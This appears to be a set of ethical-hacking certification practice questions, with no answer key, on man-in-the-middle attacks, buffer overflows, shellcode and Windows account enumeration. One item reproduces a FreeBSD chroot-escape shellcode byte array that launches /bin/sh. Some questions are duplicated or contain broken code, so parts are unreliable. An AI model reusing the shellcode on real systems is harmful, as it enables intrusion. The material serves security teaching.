Eric has discovered a fantastic package of tools named Dsniff on the Internet. He
has learnt to use these tools in his lab and is now ready for real world exploitation.
He was able to effectively intercept communications between the two entities and
establish credentials with both sides of the connections. The two remote ends of the
communication never notice that Eric is relaying the information between the two.
What would you call this attack?

A.

Interceptor

B.

  Man-in-the-middle

C.

  ARP Proxy

D.

  Poisoning Attack

A buffer overflow occurs when a program or process tries to store more data in a
buffer (temporary data storage area) then it was intended to hold.
What is the most common cause of buffer overflow in software today?

A.

Bad permissions on files.

B.

High bandwidth and large number of users.

C.

Usage of non standard programming languages.

D.

Bad quality assurance on software produced.

In Buffer Overflow exploit, which of the following registers gets overwritten with
return address of the exploit code?

A.

EIP

B.

 ESP

C.

EAP

D.

EEP

Eric has discovered a fantastic package of tools named Dsniff on the Internet. He
has learnt to use these tools in his lab and is now ready for real world exploitation.
He was able to effectively intercept communications between the two entities and
establish credentials with both sides of the connections. The two remote ends of the
communication never notice that Eric is relaying the information between the two.
What would you call this attack?

A.

Interceptor

B.

  Man-in-the-middle

C.

  ARP Proxy

D.

  Poisoning Attack

Buffer X is an Accounting application module for company can contain 200
characters. The programmer makes an assumption that 200 characters are more
than enough. Because there were no proper boundary checks being conducted.
Dave decided to insert 400 characters into the 200-character buffer which overflows
the buffer. Below is the code snippet:
Void func (void)
{int I; char buffer [200];
for (I=0; I<400; I++)

buffer (I)= A;
return;
}
How can you protect/fix the problem of your application as shown above? (Choose
two)

A.

Because the counter starts with 0, we would stop when the counter is less then 200.

B.

 Because the counter starts with 0, we would stop when the counter is more than 200.

C.

Add a separate statement to signify that if we have written 200 characters to the buffer,
the stack should stop because it cannot hold any more data.

D.

Add a separate statement to signify that if we have written less than 200 characters to
the buffer, the stack should stop because it cannot hold any more data.

Bob has a good understanding of cryptography, having worked with it for many
years. Cryptography is used to secure data from specific threat, but it does not
secure the application from coding errors. It can provide data privacy, integrity and
enable strong authentication but it cannot mitigate programming errors.
What is a good example of a programming error that Bob can use to illustrate to the
management that encryption will not address all of their security concerns?

A.

Bob can explain that a random generator can be used to derive cryptographic keys but it
uses a weak seed value and it is a form of programming error.

B.

Bob can explain that by using passwords to derive cryptographic keys it is a form of a
programming error.

C.

Bob can explain that a buffer overflow is an example of programming error and it is a
common mistake associated with poor programming technique.

D.

Bob can explain that by using a weak key management technique it is a form of
programming error.

Exhibit:

The following is an entry captured by a network IDS. You are assigned the task of
analyzing this entry. You notice the value 0x90, which is the most common NOOP
instruction for the Intel processor. You figure that the attacker is attempting a buffer
overflow attack. You also notice "/bin/sh" in the ASCII part of the output. As an
analyst what would you conclude about the attack?

A.

The buffer overflow attack has been neutralized by the IDS

B.

 The attacker is creating a directory on the compromised machine

C.

The attacker is attempting a buffer overflow attack and has succeeded

D.

The attacker is attempting an exploit that launches a command-line shell

The programmers on your team are analyzing the free, open source software being
used to run FTP services on a server. They notice that there is an excessive number
of fgets() and gets() on the source code. These C++ functions do not check bounds.
What kind of attack is this program susceptible to?

A.

Buffer of Overflow

B.

 Denial of Service

C.

Shatter Attack

D.

Password Attack

#define MAKE_STR_FROM_RET(x) ((x)&0xff), (((x)&0xff00)8),
(((x)&0xff0000)16), (((x)&0xff000000)24)
char infin_loop[]=
/* for testing purposes */
"\xEB\xFE";
char bsdcode[] =
/* Lam3rZ chroot() code rewritten for FreeBSD by venglin */
"\x31\xc0\x50\x50\x50\xb0\x7e\xcd\x80\x31\xdb\x31\xc0\x43"
"\x43\x53\x4b\x53\x53\xb0\x5a\xcd\x80\xeb\x77\x5e\x31\xc0"
"\x8d\x5e\x01\x88\x46\x04\x66\x68\xff\xff\x01\x53\x53\xb0"
"\x88\xcd\x80\x31\xc0\x8d\x5e\x01\x53\x53\xb0\x3d\xcd\x80"
"\x31\xc0\x31\xdb\x8d\x5e\x08\x89\x43\x02\x31\xc9\xfe\xc9"
"\x31\xc0\x8d\x5e\x08\x53\x53\xb0\x0c\xcd\x80\xfe\xc9\x75"
"\xf1\x31\xc0\x88\x46\x09\x8d\x5e\x08\x53\x53\xb0\x3d\xcd"
"\x80\xfe\x0e\xb0\x30\xfe\xc8\x88\x46\x04\x31\xc0\x88\x46"
"\x07\x89\x76\x08\x89\x46\x0c\x89\xf3\x8d\x4e\x08\x8d\x56"
"\x0c\x52\x51\x53\x53\xb0\x3b\xcd\x80\x31\xc0\x31\xdb\x53"
"\x53\xb0\x01\xcd\x80\xe8\x84\xff\xff\xff\xff\x01\xff\xff\x30"
"\x62\x69\x6e\x30\x73\x68\x31\x2e\x2e\x31\x31\x76\x65\x6e"
"\x67\x6c\x69\x6e";static int magic[MAX_MAGIC],magic_d[MAX_MAGIC];
static char *magic_str=NULL;
int before_len=0;
char *target=NULL, *username="user", *password=NULL;
struct targets getit;
The following exploit code is extracted from what kind of attack?

A.

Remote password cracking attack

B.

SQL Injection

C.

Distributed Denial of Service

D.

 Cross Site Scripting

E.

Buffer Overflow

One of your team members has asked you to analyze the following SOA record.
What is the version?
Rutgers.edu.SOA NS1.Rutgers.edu ipad.college.edu (200302028 3600
3600 604800 2400.

A.

200303028

B.

 3600

C.

 604800

D.

2400

E.

 60

F.

 4800

When writing shellcodes, you must avoid _________________ because these will
end the string.

A.

Null Bytes

B.

Root Bytes

C.

Char Bytes

D.

 Unicode Bytes

John is a keen administrator, and has followed all of the best practices as he could
find on securing his Windows Server. He has renamed the Administrator account to
a new name that he is sure cannot be easily guessed. However, there are people who
already attempt to compromise his newly renamed administrator account.
How is it possible for a remote attacker to decipher the name of the administrator
account if it has been renamed?

A.

The attacker used the user2sid program.

B.

The attacker used the sid2user program.

C.

The attacker used nmap with the –V switch.

D.

 The attacker guessed the new name.